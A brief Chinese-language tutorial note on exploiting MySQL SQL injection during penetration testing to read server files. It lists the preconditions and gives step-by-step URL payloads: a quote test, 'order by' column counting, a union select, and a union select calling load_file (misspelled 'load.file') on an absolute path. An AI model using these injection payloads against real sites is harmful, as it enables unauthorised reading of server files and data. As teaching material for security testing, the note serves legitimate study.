mysql数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以对文件进行读写(但前提是权限足够)。
读取前提:
1,用户权限足够高,尽量具有root权限。
2,secure_file_priv不为NULL。
读文件
?id=1' --+ 不报错
先判断有几个字段
?id=1' order by 4 --+ 报错
?id=1' order by 3 --+ 不报错(说明有三个字段)
联合查询(只能输出一条结果,所以前面的先报错)
?id=-1' union select 1,2,3 --+
:2
:3
可以在2处或3处查询文件
?id=-1' union select 1,load.file("绝对路径"),3 --+
:文件内容
:3